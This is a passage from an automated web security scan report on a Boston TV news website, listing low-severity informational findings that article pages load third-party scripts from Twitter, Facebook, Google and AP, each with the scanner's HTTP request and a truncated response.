Expires: Tue, 25 Jan 2011 02:57:13 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18686
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Steelers beat Jets 24-19 for AFC title</title>
<meta name="publisher" cont
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1554. http://www1.whdh.com/news/articles/sports/12003353873253/steelers-vs-pack-a-hair-raisin-game-in-big-d/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/sports/12003353873253/steelers-vs-pack-a-hair-raisin-game-in-big-d/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/sports/12003353873253/steelers-vs-pack-a-hair-raisin-game-in-big-d/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:14 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=26529
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 05:17:34 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20875
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Steelers vs. Pack: A hair-raisin' game in Big D</title>
<meta name="publis
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1555. http://www1.whdh.com/news/articles/viewervoices/12003189166055/what-do-you-think-about-the-governor-s-agenda-for-his-second-term/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/viewervoices/12003189166055/what-do-you-think-about-the-governor-s-agenda-for-his-second-term/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi
https://7newswhdh.appspot.com/js/ytd-embed.js

Request

GET /news/articles/viewervoices/12003189166055/what-do-you-think-about-the-governor-s-agenda-for-his-second-term/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:48 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=25438
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 04:59:57 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21786
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - What do you think about the governor's agenda for his second term?</title>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" src="https://7newswhdh.appspot.com/js/ytd-embed.js"></script>
...[SNIP]...

21.1556. http://www1.whdh.com/news/articles/viewervoices/12003343955230/how-are-you-dealing-with-all-the-snow/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/viewervoices/12003343955230/how-are-you-dealing-with-all-the-snow/

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi
https://7newswhdh.appspot.com/js/ytd-embed.js

Request

GET /news/articles/viewervoices/12003343955230/how-are-you-dealing-with-all-the-snow/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:42 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=26899
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 05:24:11 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21658
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - How are you dealing with all the snow?</title>
<meta name="publisher" cont
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" src="https://7newswhdh.appspot.com/js/ytd-embed.js"></script>
...[SNIP]...

21.1557. http://www1.whdh.com/news/articles/world/12003356844567/official-pirates-may-try-to-avenge-skorean-rescue/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/world/12003356844567/official-pirates-may-try-to-avenge-skorean-rescue/

Issue detail

The response dynamically includes the following scripts from other domains:

http://img.video.ap.org/p/j/apovn.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/world/12003356844567/official-pirates-may-try-to-avenge-skorean-rescue/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:06 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=18422
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 03:02:19 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19725
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Official: Pirates may try to avenge SKorean rescue</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div style="text-align:center;">
<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js"></script>
...[SNIP]...

21.1558. http://www1.whdh.com/news/articles/world/12003357704219/moscow-airport-terror-attack-kills-31-wounds-168/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/world/12003357704219/moscow-airport-terror-attack-kills-31-wounds-168/

Issue detail

The response dynamically includes the following scripts from other domains:

http://img.video.ap.org/p/j/apovn.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/world/12003357704219/moscow-airport-terror-attack-kills-31-wounds-168/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:09 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=39035
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:45:54 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 28057
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Moscow airport terror attack kills 31, wounds 168</title>
<meta name="publ
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div style="text-align:center;">
<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js"></script>
...[SNIP]...

21.1559. http://www1.whdh.com/news/articles/world/12003359648674/london-bound-flight-diverted-after-threat/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/world/12003359648674/london-bound-flight-diverted-after-threat/

Issue detail

The response dynamically includes the following scripts from other domains:

http://img.video.ap.org/p/j/apovn.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/world/12003359648674/london-bound-flight-diverted-after-threat/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:10 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=38970
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:44:49 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19062
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - London-bound flight diverted after threat</title>
<meta name="publisher" c
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div style="text-align:center;">
<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js"></script>
...[SNIP]...

21.1560. http://www1.whdh.com/news/articles/world/21003357763036/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/articles/world/21003357763036/

Issue detail

The response dynamically includes the following scripts from other domains:

http://img.video.ap.org/p/j/apovn.js
http://platform.twitter.com/widgets.js
http://static.ak.fbcdn.net/connect.php/js/FB.Share
http://www.google.com/jsapi

Request

GET /news/articles/world/21003357763036/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:06 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=32952
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 07:04:28 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 24623
Via: 1.1 dfw107006 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Moscow airport terror attack kills 31, wounds 168</title>
<meta name="publ
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
<div style="text-align:center;">
<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js"></script>
...[SNIP]...

21.1561. http://www1.whdh.com/news/main/bizarre/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/main/bizarre/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /news/main/bizarre/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:49:28 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 351
Cache-Control: max-age=1668
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:16:26 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107017 (MII-APC/1.6)
Content-Length: 32352
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title></title>
<meta name="publisher" content="New England News Station Boston Channel 7 W
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1562. http://www1.whdh.com/news/main/entertainment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/main/entertainment/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /news/main/entertainment/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:17 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1749
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:23:36 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 32646
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Entertainment News, Celebrity Gossip, Movie Trailers, TV and Mu
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1563. http://www1.whdh.com/news/main/local/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/main/local/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /news/main/local/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:11 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=1311
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:16:12 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107006 (MII-APC/1.6)
Content-Length: 33479
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Local / Regional Massachusetts and New England News</title>
<m
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1564. http://www1.whdh.com/news/main/local/boston/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/main/local/boston/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /news/main/local/boston/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:09 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1
Cache-Control: max-age=1748
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:39:26 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 mdw107113 (MII-APC/1.6)
Connection: close
Content-Length: 33406

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Metro Boston News</title>
<meta name="publisher" content="New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1565. http://www1.whdh.com/news/main/local/capeandislands/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/main/local/capeandislands/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /news/main/local/capeandislands/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:13 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 2
Cache-Control: max-age=1747
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:39:28 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 mdw107101 (MII-APC/1.6)
Connection: close
Content-Length: 16943

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Cape Cod and Islands News</title>
<meta name="publisher" conte
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1566. http://www1.whdh.com/news/main/local/metro-west/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/main/local/metro-west/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /news/main/local/metro-west/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:08 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=727
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:22:23 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 34574
Via: 1.1 mdw107114 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Boston Metro West News</title>
<meta name="publisher" content=
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1567. http://www1.whdh.com/news/main/local/north/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/main/local/north/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /news/main/local/north/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:10 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1
Cache-Control: max-age=1748
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:39:27 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 mdw107104 (MII-APC/1.6)
Connection: close
Content-Length: 33647

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH NBC Boston 7NEWS Boston North News</title>
<meta name="publisher" content="New
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

21.1568. http://www1.whdh.com/news/main/local/south/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.whdh.com
Path:	/news/main/local/south/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi

Request

GET /news/main/local/south/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.3.10.1295906131;

Response

HTTP/1.1 200 OK
